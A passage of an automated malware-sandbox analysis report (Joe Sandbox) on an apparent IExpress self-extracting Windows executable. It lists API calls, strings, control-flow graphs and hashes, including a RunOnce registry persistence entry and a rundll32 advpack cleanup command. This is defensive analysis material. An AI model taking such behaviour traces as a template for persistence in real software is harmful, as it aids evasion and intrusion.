                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                                            • Opcode ID: 7256ba995165edb2e9a1b70313e8bfb640a0ef42b4861ae33f9f5ae187c60765
                                                                                                                                                                                                                                                            • Instruction ID: eb8e031fd3eadf3d91349cc4d378c943bb83f67e0826b3a003f2381307ea67a6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7256ba995165edb2e9a1b70313e8bfb640a0ef42b4861ae33f9f5ae187c60765
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B831917164031CABEB209B69DC49FBBB77CEB94704F15C1A9FA49D22A1CA305D85CB31
                                                                                                                                                                                                                                                            Function 00DF2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00DF6BB0,00DF0000,00000000,00000002,0000000A), ref: 00DF2C03
                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00DF6BB0,00DF0000,00000000,00000002,0000000A), ref: 00DF2C18
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00DF2C28
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00DF6BB0,00DF0000,00000000,00000002,0000000A), ref: 00DF2C98
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                            • Opcode ID: c04956ff709ee9f191eea26110fc287ae294d151c4a13beaad8dba00659213d7
                                                                                                                                                                                                                                                            • Instruction ID: 299213a56ef3972e4e6cf1628669ac799dc299fc3b48b6df73c92011fca2a052
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c04956ff709ee9f191eea26110fc287ae294d151c4a13beaad8dba00659213d7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4511CE7160030DABD7206BB9AC9AB7E37A9EB88394B0BC025FB08D7355DA31DC41C675
                                                                                                                                                                                                                                                            Function 00DF202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF2050
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF205F
                                                                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00DF208C
                                                                                                                                                                                                                                                              • Part of subcall function 00DF171E: _vsnprintf.MSVCRT ref: 00DF1750
                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?), ref: 00DF20C9
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00DF20EA
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DF2103
                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?), ref: 00DF2122
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00DF2134
                                                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000,?,?,?,?), ref: 00DF2144
                                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DF215B
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?), ref: 00DF218C
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00DF21C1
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 00DF21E4
                                                                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00DF223D
                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00DF2249
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DF2250
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                                            • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                                                                                                                                                            • API String ID: 178549006-3726664654
                                                                                                                                                                                                                                                            • Opcode ID: 69635ea338d0c1180109718ec1b7f532305d9b5c1b31825045f938c4105902f0
                                                                                                                                                                                                                                                            • Instruction ID: 1512aff6bdf3ed26724e0582bd81761c5ad844bcd628481a622c9b0c59307fbf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 69635ea338d0c1180109718ec1b7f532305d9b5c1b31825045f938c4105902f0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F51F4B190031CAFDB209B64EC49FFA7728EB54700F06C1A4BB49E6250DE719E89CA74
                                                                                                                                                                                                                                                            Function 00DF55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 232 df55a0-df55d9 call df468f LocalAlloc 235 df55fd-df560c call df468f 232->235 236 df55db-df55f1 call df44b9 call df6285 232->236 242 df560e-df5630 call df44b9 LocalFree 235->242 243 df5632-df5643 lstrcmpA 235->243 248 df55f6-df55f8 236->248 242->248 246 df564b-df5659 LocalFree 243->246 247 df5645 243->247 250 df565b-df565d 246->250 251 df5696-df569c 246->251 247->246 252 df58b7-df58c7 call df6ce0 248->252 255 df565f-df5667 250->255 256 df5669 250->256 253 df589f-df58b5 call df6517 251->253 254 df56a2-df56a8 251->254 253->252 254->253 260 df56ae-df56c1 GetTempPathA 254->260 255->256 257 df566b-df567a call df5467 255->257 256->257 269 df589b-df589d 257->269 270 df5680-df5691 call df44b9 257->270 264 df56f3-df5711 call df1781 260->264 265 df56c3-df56c9 call df5467 260->265 274 df586c-df5890 GetWindowsDirectoryA call df597d 264->274 275 df5717-df5729 GetDriveTypeA 264->275 272 df56ce-df56d0 265->272 269->252 270->248 272->269 276 df56d6-df56df call df2630 272->276 274->264 286 df5896 274->286 278 df572b-df572e 275->278 279 df5730-df5740 GetFileAttributesA 275->279 276->264 287 df56e1-df56ed call df5467 276->287 278->279 282 df5742-df5745 278->282 279->282 283 df577e-df578f call df597d 279->283 289 df576b 282->289 290 df5747-df574f 282->290 297 df57b2-df57bf call df2630 283->297 298 df5791-df579e call df2630 283->298 286->269 287->264 287->269 292 df5771-df5779 289->292 290->292 294 df5751-df5753 290->294 296 df5864-df5866 292->296 294->292 299 df5755-df5762 call df6952 294->299 296->274 296->275 307 df57d3-df57f8 call df658a GetFileAttributesA 297->307 308 df57c1-df57cd GetWindowsDirectoryA 297->308 298->289 306 df57a0-df57b0 call df597d 298->306 299->289 309 df5764-df5769 299->309 306->289 306->297 314 df580a 307->314 315 df57fa-df5808 CreateDirectoryA 307->315 308->307 309->283 309->289 316 df580d-df580f 314->316 315->316 317 df5827-df585c SetFileAttributesA call df1781 call df5467 316->317 318 df5811-df5825 316->318 317->269 323 df585e 317->323 318->296 323->296
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00DF55CF
                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00DF5638
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00DF564C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00DF5620
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6285: GetLastError.KERNEL32(00DF5BBC), ref: 00DF6285
                                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00DF56B9
                                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00DF571E
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00DF5737
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00DF57CD
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00DF57EF
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00DF5802
                                                                                                                                                                                                                                                              • Part of subcall function 00DF2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00DF2654
                                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00DF5830
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: FindResourceA.KERNEL32(00DF0000,000007D6,00000005), ref: 00DF652A
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: LoadResource.KERNEL32(00DF0000,00000000,?,?,00DF2EE8,00000000,00DF19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00DF6538
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: DialogBoxIndirectParamA.USER32(00DF0000,00000000,00000547,00DF19E0,00000000), ref: 00DF6557
                                                                                                                                                                                                                                                              • Part of subcall function 00DF6517: FreeResource.KERNEL32(00000000,?,?,00DF2EE8,00000000,00DF19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00DF6560
                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00DF5878
                                                                                                                                                                                                                                                              • Part of subcall function 00DF597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00DF59A8
                                                                                                                                                                                                                                                              • Part of subcall function 00DF597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00DF59AF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                            • API String ID: 2436801531-2740620654
                                                                                                                                                                                                                                                            • Opcode ID: 954577e017b0765ac6fc5e9b9464240b10069bf00a8aa226f33f45b0fafb5e9d
                                                                                                                                                                                                                                                            • Instruction ID: 94f03bcd8aef7fb3bf89547d1016ee85ed1e9f7415d0c3c63cc42e7653f3a05a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 954577e017b0765ac6fc5e9b9464240b10069bf00a8aa226f33f45b0fafb5e9d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C812A70A04B0D9ADB20AB74BC41BFA765D9B51340F0AC065F78AD2299EF708DC1CB71
                                                                                                                                                                                                                                                            Function 00DF2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 324 df2caa-df2d1c memset * 3 call df468f 327 df2ef3 324->327 328 df2d22-df2d27 324->328 330 df2ef8-df2f01 call df44b9 327->330 328->327 329 df2d2d-df2d59 CreateEventA SetEvent call df468f 328->329 335 df2d7d-df2d84 329->335 336 df2d5b-df2d78 call df44b9 329->336 334 df2f06 330->334 337 df2f08-df2f18 call df6ce0 334->337 339 df2e1f-df2e2e call df5c9e 335->339 340 df2d8a-df2da1 call df468f 335->340 336->334 349 df2e3a-df2e41 339->349 350 df2e30-df2e35 339->350 340->336 348 df2da3-df2dbb CreateMutexA 340->348 348->339 353 df2dbd-df2dc8 GetLastError 348->353 351 df2e43-df2e4d call df2390 349->351 352 df2e52-df2e62 FindResourceA 349->352 350->330 351->334 356 df2e6e-df2e75 352->356 357 df2e64-df2e6c LoadResource 352->357 353->339 355 df2dca-df2dd3 353->355 359 df2dea-df2e02 call df44b9 355->359 360 df2dd5-df2de8 call df44b9 355->360 361 df2e7d-df2e84 356->361 362 df2e77 356->362 357->356 359->339 370 df2e04-df2e1a CloseHandle 359->370 360->370 365 df2e8b-df2e94 call df36ee 361->365 366 df2e86-df2e89 361->366 362->361 365->334 372 df2e96-df2ea2 365->372 366->337 370->334 373 df2ea4-df2ea8 372->373 374 df2eb0-df2eba 372->374 373->374 375 df2eaa-df2eae 373->375 376 df2eef-df2ef1 374->376 377 df2ebc-df2ec3 374->377 375->374 375->376 376->337 377->376 378 df2ec5-df2ecc call df18a3 377->378 378->376 381 df2ece-df2eed call df6517 378->381 381->334 381->376
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF2CD9
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF2CE9
                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00DF2CF9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46A0
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: SizeofResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46A9
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00DF46C3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LoadResource.KERNEL32(00000000,00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: LockResource.KERNEL32(00000000,?,00DF2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46D3
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: memcpy_s.MSVCRT ref: 00DF46E5
                                                                                                                                                                                                                                                              • Part of subcall function 00DF468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF46EF
                                                                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF2D34
                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF2D40
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF2DAE
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00DF2DBD
                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(valid,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00DF2E0A
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                              • Part of subcall function 00DF44B9: MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                                            • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$valid
                                                                                                                                                                                                                                                            • API String ID: 1002816675-2613340241
                                                                                                                                                                                                                                                            • Opcode ID: a08767cc1b3cd52db88fbb90c26e578c1f93916930785f6cdc64d66bdd94e1c7
                                                                                                                                                                                                                                                            • Instruction ID: 2aca9eafa79dd7aa110ba2d0a6a02522224e6811cb7f4af4a39d9f111eb95e6c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a08767cc1b3cd52db88fbb90c26e578c1f93916930785f6cdc64d66bdd94e1c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8251047074030DAAE720A7249C5AB7B3698DB85710F1BC029BB85D53D5DFB48C81D636
                                                                                                                                                                                                                                                            Function 00DF44B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 466 df44b9-df44f8 467 df44fe-df4525 LoadStringA 466->467 468 df4679-df467b 466->468 470 df4527-df452e call df681f 467->470 471 df4562-df4568 467->471 469 df467c-df468c call df6ce0 468->469 478 df453f 470->478 479 df4530-df453d call df67c9 470->479 473 df456b-df4570 471->473 473->473 477 df4572-df457c 473->477 480 df457e-df4580 477->480 481 df45c9-df45cb 477->481 485 df4544-df4554 MessageBoxA 478->485 479->478 479->485 486 df4583-df4588 480->486 483 df45cd-df45cf 481->483 484 df4607-df4617 LocalAlloc 481->484 488 df45d2-df45d7 483->488 489 df455a-df455d 484->489 490 df461d-df4628 call df1680 484->490 485->489 486->486 491 df458a-df458c 486->491 488->488 492 df45d9-df45ed LocalAlloc 488->492 489->469 496 df462d-df463d MessageBeep call df681f 490->496 494 df458f-df4594 491->494 492->489 495 df45f3-df4605 call df171e 492->495 494->494 497 df4596-df45ad LocalAlloc 494->497 495->496 505 df463f-df464c call df67c9 496->505 506 df464e 496->506 497->489 500 df45af-df45c7 call df171e 497->500 500->496 505->506 508 df4653-df4677 MessageBoxA LocalFree 505->508 506->508 508->469
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00DF4518
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,valid,00010010), ref: 00DF4554
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00DF45A3
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00DF45E3
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00DF460D
                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00DF4630
                                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,valid,00000000), ref: 00DF4666
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00DF466F
                                                                                                                                                                                                                                                              • Part of subcall function 00DF681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00DF686E
                                                                                                                                                                                                                                                              • Part of subcall function 00DF681F: GetSystemMetrics.USER32(0000004A), ref: 00DF68A7
                                                                                                                                                                                                                                                              • Part of subcall function 00DF681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00DF68CC
                                                                                                                                                                                                                                                              • Part of subcall function 00DF681F: RegQueryValueExA.ADVAPI32(?,00DF1140,00000000,?,?,?), ref: 00DF68F4
                                                                                                                                                                                                                                                              • Part of subcall function 00DF681F: RegCloseKey.ADVAPI32(?), ref: 00DF6902
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_df0000_Tii6ue74NB.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$valid
                                                                                                                                                                                                                                                            • API String ID: 3244514340-303183264
                                                                                                                                                                                                                                                            • Opcode ID: 316a9ff3063a9bae781c20118c705e63c0befb99260251f99840d39c8ad7403f
                                                                                                                                                                                                                                                            • Instruction ID: 9d74e261118467e21c8a1d9d87b30871c366099d782e4820848467ff2a24e17c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 316a9ff3063a9bae781c20118c705e63c0befb99260251f99840d39c8ad7403f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9551B17690021DABDB21AF289C48BBA7B69EF45300F1AC194FA49E7241DB31DE45CB70
                                                                                                                                                                                                                                                            Function 00DF53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00DF171E: _vsnprintf.MSVCRT ref: 00DF1750
                                                                                                                                                                                                                                                            • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00DF53FB
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNELBASE(?), ref: 00DF5402
                                                                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?), ref: 00DF541F
                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00DF542B
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 00DF5434
                                                                                                                                                                                                                                                            • CreateDirectoryA.KERNELBASE(?,00000000), ref: 00DF5452
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2543895110.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543830281.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2543969218.0000000000DF8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2544038247.0000000000DFA000.00000002.00000001.01000000.00000003.sdmpDownload File
